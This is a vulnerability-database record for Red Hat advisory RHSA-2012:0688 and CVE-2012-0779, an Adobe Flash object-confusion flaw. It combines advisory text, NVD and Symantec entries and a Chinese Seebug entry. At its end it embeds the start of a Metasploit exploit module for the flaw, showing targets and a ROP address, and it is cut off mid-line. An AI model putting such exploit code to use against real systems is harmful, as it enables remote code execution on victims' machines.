ID RHSA-2012:0688 Type redhat Reporter RedHat Modified 2018-06-07T09:04:25
Description
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in.
This update fixes one vulnerability in Adobe Flash Player. This
vulnerability is detailed on the Adobe security page APSB12-09, listed in
the References section. Specially-crafted SWF content could cause
flash-plugin to crash or, potentially, execute arbitrary code when a victim
loads a page containing the specially-crafted SWF content. (CVE-2012-0779)
All users of Adobe Flash Player should install this updated package, which
upgrades Flash Player to version 10.3.183.19.
{"id": "RHSA-2012:0688", "hash": "36350483770b037fb39b96fb5d7d1190", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2018-06-07T09:04:25", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2019-08-13T18:46:46", "history": [{"bulletin": {"id": "RHSA-2012:0688", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2017-03-03T17:18:15", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2017-03-04T19:18:54", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"arch": "i686", "packageFilename": "flash-plugin-10.3.183.19-1.el6.i686.rpm", "OSVersion": "6", "packageName": "flash-plugin", "OS": "RedHat", "packageVersion": "10.3.183.19-1.el6", "operator": "lt"}, {"arch": "i386", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "OSVersion": "5", "packageName": "flash-plugin", "OS": "RedHat", "packageVersion": "10.3.183.19-1.el5", "operator": "lt"}]}, "lastseen": "2017-03-04T19:18:54", "differentElements": ["affectedPackage", "modified"], "edition": 1}, {"bulletin": {"id": "RHSA-2012:0688", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2017-07-27T07:09:28", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2017-07-28T08:57:38", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "affectedPackage": [{"arch": "i386", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "OSVersion": "5", "operator": "lt", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "OS": "RedHat"}]}, "lastseen": "2017-07-28T08:57:38", "differentElements": ["affectedPackage", "modified"], "edition": 2}, {"bulletin": {"id": "RHSA-2012:0688", "hash": "", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2017-09-08T11:58:36", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2017-09-09T07:20:40", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"arch": "i386", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "OSVersion": "5", "operator": "lt", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "OS": "RedHat"}, {"arch": "i686", "packageFilename": "flash-plugin-10.3.183.19-1.el6.i686.rpm", "OSVersion": "6", "operator": "lt", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el6", "OS": "RedHat"}]}, "lastseen": "2017-09-09T07:20:40", "differentElements": ["modified"], "edition": 3}, {"bulletin": {"id": "RHSA-2012:0688", "hash": "d63aa23d523578543508ec5b52a54d14", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2018-06-07T09:04:25", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2018-06-07T05:58:09", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "arch": "i386", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el6", "packageFilename": "flash-plugin-10.3.183.19-1.el6.i686.rpm", "operator": "lt"}]}, "lastseen": "2018-06-07T05:58:09", "differentElements": ["affectedPackage"], "edition": 4}, {"bulletin": {"id": "RHSA-2012:0688", "hash": "74dac7853022cf5cec8725a3f6506d0d", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2018-06-07T09:04:25", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2018-12-11T19:42:52", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0779"]}, {"type": "symantec", "idList": ["SMNTC-53395"]}, {"type": "seebug", "idList": ["SSV:60099", "SSV:73304"]}, {"type": "openvas", "idList": ["OPENVAS:802772", "OPENVAS:802771", "OPENVAS:802773", "OPENVAS:1361412562310802771", "OPENVAS:1361412562310850271", "OPENVAS:1361412562310802772", "OPENVAS:850271", "OPENVAS:1361412562310802773", "OPENVAS:136141256231071588", "OPENVAS:71588"]}, {"type": "nessus", "idList": ["MACOSX_FLASH_PLAYER_11_2_202_235.NASL", "SUSE_11_FLASH-PLAYER-120506.NASL", "OPENSUSE-2012-262.NASL", "FLASH_PLAYER_APSB12-09.NASL", "REDHAT-RHSA-2012-0688.NASL", "GENTOO_GLSA-201206-21.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:19369"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0592-2", "OPENSUSE-SU-2012:0594-1", "SUSE-SU-2012:0592-1"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_RTMP"]}, {"type": "saint", "idList": ["SAINT:527A38F1B0C7A74B0399779CE9DD8CAB", "SAINT:9D986423B6C5EC5230B363E85437DF97", "SAINT:A145AC40B5A9B854E5E8028916AEE025"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12359"]}, {"type": "threatpost", "idList": ["THREATPOST:19EA705538DF596E222DB44DD719ED6C", "THREATPOST:82D1CCA01BBF119D850004CAE7F70E19", "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114107"]}, {"type": "gentoo", "idList": ["GLSA-201206-21"]}], "modified": "2018-12-11T19:42:52"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "arch": "i386", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "operator": "lt"}]}, "lastseen": "2018-12-11T19:42:52", "differentElements": ["cvss"], "edition": 5}, {"bulletin": {"id": "RHSA-2012:0688", "hash": "39db003d83a804ed50bfd103f73625a1", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2012:0688) Critical: flash-plugin security update", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB12-09, listed in\nthe References section. Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code when a victim\nloads a page containing the specially-crafted SWF content. (CVE-2012-0779)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.3.183.19.\n", "published": "2012-05-23T04:00:00", "modified": "2018-06-07T09:04:25", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://access.redhat.com/errata/RHSA-2012:0688", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2012-0779"], "lastseen": "2019-05-29T14:35:35", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 10.3, "vector": "NONE", "modified": "2019-05-29T14:35:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0779"]}, {"type": "symantec", "idList": ["SMNTC-53395"]}, {"type": "seebug", "idList": ["SSV:60099", "SSV:73304"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850271", "OPENVAS:802772", "OPENVAS:1361412562310802772", "OPENVAS:802773", "OPENVAS:1361412562310802771", "OPENVAS:1361412562310802773", "OPENVAS:802771", "OPENVAS:850271", "OPENVAS:136141256231071588", "OPENVAS:71588"]}, {"type": "saint", "idList": ["SAINT:9D986423B6C5EC5230B363E85437DF97", "SAINT:527A38F1B0C7A74B0399779CE9DD8CAB", "SAINT:A145AC40B5A9B854E5E8028916AEE025"]}, {"type": "nessus", "idList": ["MACOSX_FLASH_PLAYER_11_2_202_235.NASL", "OPENSUSE-2012-262.NASL", "FLASH_PLAYER_APSB12-09.NASL", "REDHAT-RHSA-2012-0688.NASL", "SUSE_11_FLASH-PLAYER-120506.NASL", "GENTOO_GLSA-201206-21.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114107"]}, {"type": "exploitdb", "idList": ["EDB-ID:19369"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2012:0594-1", "SUSE-SU-2012:0592-1", "SUSE-SU-2012:0592-2"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_RTMP"]}, {"type": "threatpost", "idList": ["THREATPOST:82D1CCA01BBF119D850004CAE7F70E19", "THREATPOST:19EA705538DF596E222DB44DD719ED6C", "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12359"]}, {"type": "gentoo", "idList": ["GLSA-201206-21"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2019-05-29T14:35:35"}}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "arch": "i386", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "operator": "lt"}]}, "lastseen": "2019-05-29T14:35:35", "differentElements": ["affectedPackage"], "edition": 6}], "viewCount": 1, "enchantments": {"score": {"value": 10.3, "vector": "NONE", "modified": "2019-08-13T18:46:46"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-0779"]}, {"type": "symantec", "idList": ["SMNTC-53395"]}, {"type": "seebug", "idList": ["SSV:60099", "SSV:73304"]}, {"type": "threatpost", "idList": ["THREATPOST:82D1CCA01BBF119D850004CAE7F70E19", "THREATPOST:19EA705538DF596E222DB44DD719ED6C", "THREATPOST:8118BE47AC766B8F6DD708B119E33DFE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802771", "OPENVAS:1361412562310802773", "OPENVAS:802771", "OPENVAS:850271", "OPENVAS:802773", "OPENVAS:1361412562310802772", "OPENVAS:802772", "OPENVAS:1361412562310850271", "OPENVAS:71588", "OPENVAS:136141256231071588"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12359"]}, {"type": "saint", "idList": ["SAINT:A145AC40B5A9B854E5E8028916AEE025", "SAINT:527A38F1B0C7A74B0399779CE9DD8CAB", "SAINT:9D986423B6C5EC5230B363E85437DF97"]}, {"type": "nessus", "idList": ["SUSE_11_FLASH-PLAYER-120506.NASL", "REDHAT-RHSA-2012-0688.NASL", "FLASH_PLAYER_APSB12-09.NASL", "MACOSX_FLASH_PLAYER_11_2_202_235.NASL", "OPENSUSE-2012-262.NASL", "GENTOO_GLSA-201206-21.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0592-2", "OPENSUSE-SU-2012:0594-1", "SUSE-SU-2012:0592-1"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_RTMP"]}, {"type": "exploitdb", "idList": ["EDB-ID:19369"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:114107"]}, {"type": "gentoo", "idList": ["GLSA-201206-21"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2019-08-13T18:46:46"}, "vulnersScore": 10.3}, "objectVersion": "1.4", "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "arch": "i386", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el5", "packageFilename": "flash-plugin-10.3.183.19-1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "arch": "i686", "packageName": "flash-plugin", "packageVersion": "10.3.183.19-1.el6", "packageFilename": "flash-plugin-10.3.183.19-1.el6.i686.rpm", "operator": "lt"}], "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-07-19T22:27:32", "bulletinFamily": "NVD", "description": "Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an \"object confusion vulnerability,\" as exploited in the wild in May 2012.", "modified": "2019-07-18T12:21:00", "id": "CVE-2012-0779", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0779", "published": "2012-05-04T19:55:00", "title": "CVE-2012-0779", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-03-12T14:14:48", "bulletinFamily": "software", "description": "### Description\n\nAdobe Flash Player is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The following versions are affected: Adobe Flash Player 11.2.202.233 and prior versions for Windows, Mac OS and Linux operating systems Adobe Flash Player 11.1.115.7 and prior versions for Android 4.x Adobe Flash Player 11.1.111.8 and prior versions for Android 3.x and 2.x\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * Rim Blackberry PlayBook Tablet Software 2.0.1.358 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE Suse Linux Enterprise Desktop 11 SP2 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run the application with the minimal amount of privileges required for functionality.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources. \n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of attacks, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources. \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\nUpdates are available. Please see the references for more information.\n", "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "SMNTC-53395", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/53395", "type": "symantec", "title": "Adobe Flash Player CVE-2012-0779 Object Type Confusion Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:52:04", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 53395\r\nCVE ID: CVE-2012-0779\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002\r\n\r\nAdobe Flash Player\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u5bf9\u8c61\u6df7\u6dc6\u6f0f\u6d1e\uff0c\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u6253\u5f00\u7535\u5b50\u90ae\u4ef6\u4e2d\u7684\u6076\u610f\u6587\u4ef6\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u5d29\u6e83\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player 11.x\r\nAdobe Flash Player 10.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb12-09\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\napsb12-09\uff1aSecurity update available for Adobe Flash Player\r\n\r\n\u94fe\u63a5\uff1ahttp://www.adobe.com/support/security/bulletins/apsb12-09.html", "modified": "2012-05-09T00:00:00", "published": "2012-05-09T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60099", "id": "SSV:60099", "type": "seebug", "title": "Adobe Flash Player\u5bf9\u8c61\u7c7b\u578b\u6df7\u6dc6\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2012-0779)", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:45:38", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-73304", "id": "SSV:73304", "title": "Adobe Flash Player Object Type Confusion", "type": "seebug", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_name => HttpClients::IE,\r\n\t\t:ua_minver => "6.0",\r\n\t\t:ua_maxver => "8.0",\r\n\t\t:method => "GetVariable",\r\n\t\t:classid => "ShockwaveFlash.ShockwaveFlash",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => "Adobe Flash Player Object Type Confusion",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a vulnerability found in Adobe Flash\r\n\t\t\t\tPlayer. By supplying a corrupt AMF0 "_error" response, it\r\n\t\t\t\tis possible to gain arbitrary remote code execution under\r\n\t\t\t\tthe context of the user.\r\n\r\n\t\t\t\tThis vulnerability has been exploited in the wild as part of\r\n\t\t\t\tthe "World Uyghur Congress Invitation.doc" e-mail attack.\r\n\t\t\t\tAccording to the advisory, 10.3.183.19 and 11.x before\r\n\t\t\t\t11.2.202.235 are affected.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-0779' ],\r\n\t\t\t\t\t[ 'OSVDB', '81656'],\r\n\t\t\t\t\t[ 'BID', '53395' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb12-09.html'], # Patch info\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t#'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => "\\x00"\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Flash Player 11.2.202.228\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 6 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => nil,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '0x0'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 7 on Windows XP SP3',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => nil,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '0x0'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'IE 8 on Windows XP SP3 with msvcrt ROP',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Rop' => :msvcrt,\r\n\t\t\t\t\t\t\t'RandomHeap' => false,\r\n\t\t\t\t\t\t\t'Offset' => '238',\r\n\t\t\t\t\t\t\t'StackPivot' => 0x77c12100, # add esp, edx # retn 77 # from 